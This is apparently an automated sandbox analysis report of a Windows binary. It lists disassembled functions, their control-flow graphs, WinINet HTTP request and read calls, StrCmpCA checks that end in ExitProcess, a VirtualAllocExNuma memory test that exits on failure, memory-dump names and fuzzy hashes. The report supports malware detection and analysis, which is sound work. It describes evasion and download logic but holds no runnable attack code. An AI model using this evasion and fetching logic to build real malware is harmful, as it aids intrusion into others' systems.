                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: f97ed4557300f206f02eb791f30137e6af86ba1df65efd4dfbe2176cd94f300c
                            • Instruction ID: f53344ae3c13fe5edfb826d7eef958c1624b535ed7cf3b516190ca9966fe4de0
                            • Opcode Fuzzy Hash: f97ed4557300f206f02eb791f30137e6af86ba1df65efd4dfbe2176cd94f300c
                            • Instruction Fuzzy Hash: 96E27C70A05341DFD735DF29D489B6ABBE0BF88314F58856EE48D8B262DB31D885CB42
                            Function 00126C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 126c40-126c64 call 122930 2237 126c66-126c6b 2234->2237 2238 126c75-126c97 call 124bc0 2234->2238 2237->2238 2239 126c6d-126c6f lstrcpy 2237->2239 2242 126caa-126cba call 122930 2238->2242 2243 126c99 2238->2243 2239->2238 2247 126cc8-126cf5 InternetOpenA StrCmpCA 2242->2247 2248 126cbc-126cc2 lstrcpy 2242->2248 2245 126ca0-126ca8 2243->2245 2245->2242 2245->2245 2249 126cf7 2247->2249 2250 126cfa-126cfc 2247->2250 2248->2247 2249->2250 2251 126d02-126d22 InternetConnectA 2250->2251 2252 126ea8-126ebb call 122930 2250->2252 2253 126ea1-126ea2 InternetCloseHandle 2251->2253 2254 126d28-126d5d HttpOpenRequestA 2251->2254 2261 126ec9-126ee0 call 122a20 * 2 2252->2261 2262 126ebd-126ebf 2252->2262 2253->2252 2256 126d63-126d65 2254->2256 2257 126e94-126e9e InternetCloseHandle 2254->2257 2259 126d67-126d77 InternetSetOptionA 2256->2259 2260 126d7d-126dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2264 126dd4-126de4 call 143f60 2260->2264 2265 126daf-126dd3 call 1473f0 call 122a20 * 2 2260->2265 2262->2261 2266 126ec1-126ec3 lstrcpy 2262->2266 2264->2265 2274 126de6-126de8 2264->2274 2266->2261 2277 126dee-126e07 InternetReadFile 2274->2277 2278 126e8d-126e8e InternetCloseHandle 2274->2278 2277->2278 2280 126e0d 2277->2280 2278->2257 2282 126e10-126e15 2280->2282 2282->2278 2283 126e17-126e3d call 147520 2282->2283 2286 126e44-126e51 call 122930 2283->2286 2287 126e3f call 122a20 2283->2287 2291 126e53-126e57 2286->2291 2292 126e61-126e8b call 122a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 126e59-126e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00126C6F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126CC2
                            • InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 00126CD5
                            • StrCmpCA.SHLWAPI(?,013FE938), ref: 00126CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,013FE5C8,00000000,00000000,-00400100,00000000), ref: 00126D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00126D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00126D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00126DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00126DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00126E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00126E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00126E8E
                            • InternetCloseHandle.WININET(?), ref: 00126E98
                            • InternetCloseHandle.WININET(00000000), ref: 00126EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00126EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: f9c94cc17af5747aa1f969224ed76ac8be728313296ba65103598a88454e36b1
                            • Instruction ID: 872cae5b93af5c15e02b0fe50de30970949e0f2175147ab38e8111037e04bff7
                            • Opcode Fuzzy Hash: f9c94cc17af5747aa1f969224ed76ac8be728313296ba65103598a88454e36b1
                            • Instruction Fuzzy Hash: 6381B271A0132AABDB21DFA4EC45FAE77B8EF48701F140169F905E72D0DB74AD548B90
                            Function 0013F4D8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(013E6388), ref: 0013F4F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F583
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F5A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F65B
                            • lstrcpy.KERNEL32(00000000,013E6388), ref: 0013F69B
                            • lstrcpy.KERNEL32(00000000,013F9238), ref: 0013F6CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F77E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0013F7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F82C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F87A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0013F8F8
                            • lstrlen.KERNEL32(013F9198), ref: 0013F926
                            • lstrcpy.KERNEL32(00000000,013F9198), ref: 0013F951
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F973
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F9C4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0013FC12
                            • lstrlen.KERNEL32(013F9128), ref: 0013FC40
                            • lstrcpy.KERNEL32(00000000,013F9128), ref: 0013FC6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013FC8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013FCDE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: c86e1273b04a7403fa7ffd5fbf54079b67faf0eb0ad100a0a2f4298310be7b5e
                            • Instruction ID: c5078c664247b549e4f8561b0a05863900dd9ab62b0639d07aa379a03840b316
                            • Opcode Fuzzy Hash: c86e1273b04a7403fa7ffd5fbf54079b67faf0eb0ad100a0a2f4298310be7b5e
                            • Instruction Fuzzy Hash: 7BF11670A01712DFCB25CF69D848B69B7E9BF44315F1881BEE8099B2A1E732DC42CB50
                            Function 00138DF0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2721 138df0-138e14 StrCmpCA 2722 138e16-138e17 ExitProcess 2721->2722 2723 138e1d-138e36 2721->2723 2725 139032-13903f call 122a20 2723->2725 2726 138e3c-138e41 2723->2726 2727 138e46-138e49 2726->2727 2729 139013-13902c 2727->2729 2730 138e4f 2727->2730 2729->2725 2770 138e43 2729->2770 2732 138e56-138e65 lstrlen 2730->2732 2733 138ed4-138ee2 StrCmpCA 2730->2733 2734 138ef4-138f08 StrCmpCA 2730->2734 2735 138fd8-138fea lstrlen 2730->2735 2736 138fbf-138fcd StrCmpCA 2730->2736 2737 138e80-138e8f lstrlen 2730->2737 2738 138fa6-138fb4 StrCmpCA 2730->2738 2739 138eaa-138eb9 lstrlen 2730->2739 2740 138f0d-138f1b StrCmpCA 2730->2740 2741 138f2d-138f3b StrCmpCA 2730->2741 2742 138f4d-138f5b StrCmpCA 2730->2742 2743 138f6d-138f7b StrCmpCA 2730->2743 2744 138f8d-138f9b StrCmpCA 2730->2744 2749 138e67-138e6c call 122a20 2732->2749 2750 138e6f-138e7b call 122930 2732->2750 2733->2729 2761 138ee8-138eef 2733->2761 2734->2729 2754 138ff4-139000 call 122930 2735->2754 2755 138fec-138ff1 call 122a20 2735->2755 2736->2729 2753 138fcf-138fd6 2736->2753 2756 138e91-138e96 call 122a20 2737->2756 2757 138e99-138ea5 call 122930 2737->2757 2738->2729 2752 138fb6-138fbd 2738->2752 2758 138ec3-138ecf call 122930 2739->2758 2759 138ebb-138ec0 call 122a20 2739->2759 2740->2729 2745 138f21-138f28 2740->2745 2741->2729 2746 138f41-138f48 2741->2746 2742->2729 2747 138f61-138f68 2742->2747 2743->2729 2748 138f81-138f88 2743->2748 2744->2729 2751 138f9d-138fa4 2744->2751 2745->2729 2746->2729 2747->2729 2748->2729 2749->2750 2779 139003-139005 2750->2779 2751->2729 2752->2729 2753->2729 2754->2779 2755->2754 2756->2757 2757->2779 2758->2779 2759->2758 2761->2729 2770->2727 2779->2729 2780 139007-139009 2779->2780 2780->2729 2781 13900b-13900d lstrcpy 2780->2781 2781->2729
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: cd04d5834d886ffeeb079c0bf7ad7dd7fa5c2dcfc352113a499cd2bcb66543a3
                            • Instruction ID: 73d37f09e89856275fb62e10e4b39241e2a4f5defd6fcbb90d2d17bacd8ce6ab
                            • Opcode Fuzzy Hash: cd04d5834d886ffeeb079c0bf7ad7dd7fa5c2dcfc352113a499cd2bcb66543a3
                            • Instruction Fuzzy Hash: C5518BB4604711EFCB399F75ED84A6AB6F8BB4470AF10082DF442D7650D7B4E481AB10
                            Function 00124BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2793 124bc0-124bce 2794 124bd0-124bd5 2793->2794 2794->2794 2795 124bd7-124c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 122a20 2794->2795
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00124BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00124C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00124C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00124C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00124C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 2906766ae90932166d512a9da4bc704983719be1d1906771b6f6b7e1de2e1834
                            • Instruction ID: 81c3e303a7cf2c6dbe6356faa79aa6fcf344145102ead6d26ddbc36a59649fd8
                            • Opcode Fuzzy Hash: 2906766ae90932166d512a9da4bc704983719be1d1906771b6f6b7e1de2e1834
                            • Instruction Fuzzy Hash: 1C014071D00218AFDB10DFA8EC45B9EBBB8EB19325F004126F954E7390DB7499058FD4
                            Function 00121030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2798 121030-121055 GetCurrentProcess VirtualAllocExNuma 2799 121057-121058 ExitProcess 2798->2799 2800 12105e-12107b VirtualAlloc 2798->2800 2801 121082-121088 2800->2801 2802 12107d-121080 2800->2802 2803 1210b1-1210b6 2801->2803 2804 12108a-1210ab VirtualFree 2801->2804 2802->2801 2804->2803
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00121046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 0012104D
                            • ExitProcess.KERNEL32 ref: 00121058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0012106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 001210AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: fbebc40960462c69e8e1de072f86dbdc6492d8cd01850d01988018dbde7c6a8b
                            • Instruction ID: ca6c9a59d900d0779b7b2375192031280803beb612401f7976c602daed8dbbd7
                            • Opcode Fuzzy Hash: fbebc40960462c69e8e1de072f86dbdc6492d8cd01850d01988018dbde7c6a8b
                            • Instruction Fuzzy Hash: C701F471740314BBE7204B657C5AF6B77EDA794B12F308415F704E72D0DAB1EE008668
                            Function 0013F070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2805 13f070-13f095 call 122930 2808 13f097-13f09f 2805->2808 2809 13f0a9-13f0ad call 126c40 2805->2809 2808->2809 2810 13f0a1-13f0a3 lstrcpy 2808->2810 2812 13f0b2-13f0c8 StrCmpCA 2809->2812 2810->2809 2813 13f0f1-13f0f8 call 122a20 2812->2813 2814 13f0ca-13f0e2 call 122a20 call 122930 2812->2814 2820 13f100-13f108 2813->2820 2823 13f125-13f180 call 122a20 * 10 2814->2823 2824 13f0e4-13f0ec 2814->2824 2820->2820 2822 13f10a-13f117 call 122930 2820->2822 2822->2823 2830 13f119 2822->2830 2824->2823 2826 13f0ee-13f0ef 2824->2826 2829 13f11e-13f11f lstrcpy 2826->2829 2829->2823 2830->2829
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F0A3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0013F0BE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0013F11F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 1a671beaa489e6b2329ad1121a2bac44076e53fc7a00d1358845f0130fbc516b
                            • Instruction ID: e7562c7c469381e44ea93729390045d09e4f5dd7c54c2350d57fbbb974bb541b
                            • Opcode Fuzzy Hash: 1a671beaa489e6b2329ad1121a2bac44076e53fc7a00d1358845f0130fbc516b
                            • Instruction Fuzzy Hash: 5E214670A20226ABCB25FF78FC4769E37A4AF25305F005528F84ADBA56DB30D8658790
                            Function 00138DCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2886 138dca-138e14 StrCmpCA 2888 138e16-138e17 ExitProcess 2886->2888 2889 138e1d-138e36 2886->2889 2891 139032-13903f call 122a20 2889->2891 2892 138e3c-138e41 2889->2892 2893 138e46-138e49 2892->2893 2895 139013-13902c 2893->2895 2896 138e4f 2893->2896 2895->2891 2936 138e43 2895->2936 2898 138e56-138e65 lstrlen 2896->2898 2899 138ed4-138ee2 StrCmpCA 2896->2899 2900 138ef4-138f08 StrCmpCA 2896->2900 2901 138fd8-138fea lstrlen 2896->2901 2902 138fbf-138fcd StrCmpCA 2896->2902 2903 138e80-138e8f lstrlen 2896->2903 2904 138fa6-138fb4 StrCmpCA 2896->2904 2905 138eaa-138eb9 lstrlen 2896->2905 2906 138f0d-138f1b StrCmpCA 2896->2906 2907 138f2d-138f3b StrCmpCA 2896->2907 2908 138f4d-138f5b StrCmpCA 2896->2908 2909 138f6d-138f7b StrCmpCA 2896->2909 2910 138f8d-138f9b StrCmpCA 2896->2910 2915 138e67-138e6c call 122a20 2898->2915 2916 138e6f-138e7b call 122930 2898->2916 2899->2895 2927 138ee8-138eef 2899->2927 2900->2895 2920 138ff4-139000 call 122930 2901->2920 2921 138fec-138ff1 call 122a20 2901->2921 2902->2895 2919 138fcf-138fd6 2902->2919 2922 138e91-138e96 call 122a20 2903->2922 2923 138e99-138ea5 call 122930 2903->2923 2904->2895 2918 138fb6-138fbd 2904->2918 2924 138ec3-138ecf call 122930 2905->2924 2925 138ebb-138ec0 call 122a20 2905->2925 2906->2895 2911 138f21-138f28 2906->2911 2907->2895 2912 138f41-138f48 2907->2912 2908->2895 2913 138f61-138f68 2908->2913 2909->2895 2914 138f81-138f88 2909->2914 2910->2895 2917 138f9d-138fa4 2910->2917 2911->2895 2912->2895 2913->2895 2914->2895 2915->2916 2945 139003-139005 2916->2945 2917->2895 2918->2895 2919->2895 2920->2945 2921->2920 2922->2923 2923->2945 2924->2945 2925->2924 2927->2895 2936->2893 2945->2895 2946 139007-139009 2945->2946 2946->2895 2947 13900b-13900d lstrcpy 2946->2947 2947->2895
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
